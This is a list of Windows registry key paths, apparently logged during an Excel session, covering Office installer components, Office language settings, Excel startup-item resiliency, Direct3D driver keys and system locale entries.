HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\379E92CC2CB71D119A12000A9CE1A22A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2A8F3F35080EE3E48A4E69A1726B20C9\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\115682E35C354A747AB19A8B37511A7E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\648465DF56EA66345BB2567B0F873BE7\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E1C7A107880935E48BF2271B25500A01\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\123A732343FF9B945BE4CB85C922D77E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1D54092CA66F47143BC7720DEE6C1520\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8741F187B4431884F851C69EE93CCC80\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EE4121E3A9B6A8046B31DD1157F16447\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\646E3426DE12AD448ACF14D7B83A7E16\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\38B4816825059EF5ABEFE7AC69DC237A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\854320E5CD315974BB230446F54F012B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\46FF8D92C641ED4469A6364C3DF80F53\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\86FDD2C8637365C489BEB6DC30E9FBB7\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9BCF244F508B5E84D97CE5B20ED48AC1\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\304137362B940964CB6A957A63031F9B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E2804C1692E9F684CACC9E114F49C8BB\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C80E91F77D2396F49A9B971548BEFEC8\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4608B75C85EB92E4B9C78C18C52F177B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7E7133CE0DB89F148818C6E45D79BFDC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\56CDF88E115A2914F94BA591E8FE427E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E2C67F53B44B8E44CA78D31E45C0AEC9\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\90ACD79B4EF140F4281AC4059348577F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\740F27CC073749E4E96E7B55BE37D49A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AEDAB3D6E7F6C2C4684D92A5E897BC1C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B12F5455BBA80C849A3154420AB8F9F6\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\78C18AA6E7771834FB7DE38FC605A037\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E48DA50A37CFB4541808027C61577613\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\11ABDF44143022045A74807F2199D297\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3054A48C6DA69514F8A11C66A1FE4D43\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\01211C777013DA94EA165EB6354C7BB3\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A5D24E6113CF0F848ABE77515177DCB5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6F87D976C4168904EA01C6B79C7D3357\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3422A1FF37E556F48874D71DA1A7FCBC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9878932B862896C45B61278195E274B1\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\05FF053B717129E4C97F9560D8E3C885\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4DD2033E784F9BE46B16A770B3DE0173\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2CD56AAE28348674E9675C463C6021D2\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\677C6A4AF7669584890696422D933362\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BE632C1D2D584A14BB4583F6D3E91962\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\50AD92533E1A17F4398E08E3C40D8611\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FD5CBA1C4F15D0A4495AFAF4ECA7D2F0\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\82FE3EC09B47F3A4A9C7014EBD86BC95\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7CA503EFF8D2D6843935591226A56DB7\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\568441CE89338D64097ACA530FE9F449\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\42DFE5C4C26DDA643B2E1B3484F5CFCA\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\492B803F9C3D84445A98619F89E031D3\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\95A9ED41010BA924891E408D13FBAA76\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C2D3C6C2DFB724740A4E4B0B2A54D044\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D8B2A845CEE54EC44A57186B5ECE7925\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\32F51D7A41D895849B5D36E5D0069CD8\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E584DF3B766E94F4090BF856C52425BA\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\06AC92CD1BDDEBC4B873F402329012C6\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5A9E53D7D94D36E4EA4A12EEF94D7086\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C6DF6EA175C7A0240B2B10FDF2585BD1\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\22ADF1C4CAEE30248811919795CE877E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\39AE6A38F56EF6C4ABAD6D350D6CFEA1\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3ED8D912A4A5CC74FA57E4C248AA17B4\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7D0AC866B878B5145B6EC164ED85151B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\52EF7531F13280A4DAFF25060DBF0508\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F0C7C77C6A9753F40A5A1D4EF678DF13\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\376DDCFD80ED01249AC8112B8EE543FF\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3D9924FDD5EA83546A505DA15FA902E8\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8A4601ED49F6D194998E10FA9F6C0300\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\712CCCD0696BA1442950CA32E7C6E64D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\52625D694C7E56F40B1664FA45158D4F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5ED2E63ACCCE6D44D9F84B8D7FB73C68\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EEE14C3FC3FEFA3458AD37B6FB29E0F0\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2C6FF36D67277F846A233951912B7E0C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EE86D47743D6EFB4F8BA1313727CB711\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\96C59964CACA65D499A0D2D62A316FB7\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AEB456C6427B5ED478C08584CF81B108\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F30559A9485777D42AE55615AC729C5E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A725889A5DF965C4E84A0253A39A5952\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F4531591FCEEEA847980AFCF85694A10\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2C6B91EE7E44A8147AFEED184561DAA8\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3687791E032C1A747810904287441F47\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\02D8650385D45DC44B6E0BF69EF2846B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8E6588906D8C60C43831FCEC4BD6F719\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\413A5FB960BAC1A40A0B8DE39F0CB75E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\08C0566F2C64AB248B37D78ABA9730ED\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FA7B51453E2C43343BD5241072D09F18\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\702E54543307B3C42A4EE7EEFB06E454\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B3D93E8E53F48D638B29B48233F60E14\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C069AA2AC3DFD6A3DBF641390311FA3B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8F139CF91DE936230A1FA8ED33D0E0EC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\97FC00201A9B4EB359A592AFD9B4A1C5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C8BA4DF4F75C28732903C9AC2251A33D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B6AE1A6418D39933981921F7F7A77EA6\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\91EDD49C07CCA9B36AFAC57A43B0B9A9\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6AF6D649BB945143DAD2D436C434C20F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\841B335EA38A88737A36C0C664FCC63C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3A1C53B88CB3F7C33B57D6B5E272B8FF\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0B76360A9B1D0AC35A81B25B36672275\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BF427A2B66EB00A3182637A36261AA34\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BCE00C92AF70C413399B4A50F82E20B5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7FD8D5E49CB105931B840901B2EC77A7\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\18E39E9B8AC8A5A3EA358562C997478C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7E52BAFB9807F7F32B60B598A4DBB7A7\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\52FCE2A887EC8E939BD4BAB1A128F53C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CF1288ED10B63B4328E2F1739AE9A4E2\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\084451265844F4A47ABA441C208BA4B1\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D82BFA0262BF08949AC6E23C8EF18003\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D0B3D76D8121493449064B942F126861\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BECCD8561A9AEEF40A4B78A2B173394D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4D97A600289B46B42AC7370CB5D1432E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EAEB6DE731F9CE948A644F1360AC5BB3\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\642F24263BBA5A94FA7EB6178A2B505B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F303394DBB2714E4BA8BC34DF322DBD9\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6C9A6F846E2818A47A408CAF13381C71\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Usage\ProductFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\LanguageResources\SKULanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreferredEditingLanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreviousPreferredEditingLanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UIFallbackSource
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\LanguageResources\InstalledUICultures\en-us
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UISnapshotLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UIFallbackLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\FollowSystemUILanguage
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\LanguageResources\UILanguageInstallerFallbackOrder
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpFallbackLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpLanguageExplicit
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UILanguageTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpLanguageTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\ExeMode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\LangTuneUp
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\InstallFonts
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DriverCompat\Size
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DriverCompat\Name
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\Drivers\Size
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\Drivers\Name
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DX6TextureEnumInclusionList\Size
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DX6TextureEnumInclusionList\Name
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1A09ECE35544363439463E4AB55A621E\00006109F00000000000000000F01FEC
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\!vh
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\"vh
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6D3588D4312FC664C94D84B670142C50\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Features\00006109F00000000000000000F01FEC\EXCELFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Features\EXCELFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\820E548C190EE2442820125F695C950A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DAC2F939EC01C57459C7E63331E5811F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BEDE53AF72BC15F4DB5B0A54F74BE2F4\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F30310DBE8910274AAB7564DFA731AD2\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0D5E46558D61E624FBD49F580C60AAAD\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B817069A20A723644ABD77B5904BA680\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FD9DBA6C1A1DBA34F9A96AE000B36C9B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6CFF80B23458D1A4F9423CBA598F08ED\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\54446A4E4C59A3F43ABF5DA35AA67E85\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D17369B4AAC587B4E968E0BF0771D07F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Usage\EXCELFiles
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-SA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-SA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bg
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bg
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bg-BG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bg-BG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ca
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ca
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ca-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ca-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zh-Hans
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zh-Hans
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zh-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zh-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\cs
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\cs
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\cs-CZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\cs-CZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\da
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\da
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\da-DK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\da-DK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\de
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\de
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\de-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\de-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\el
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\el
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\el-GR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\el-GR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-ES
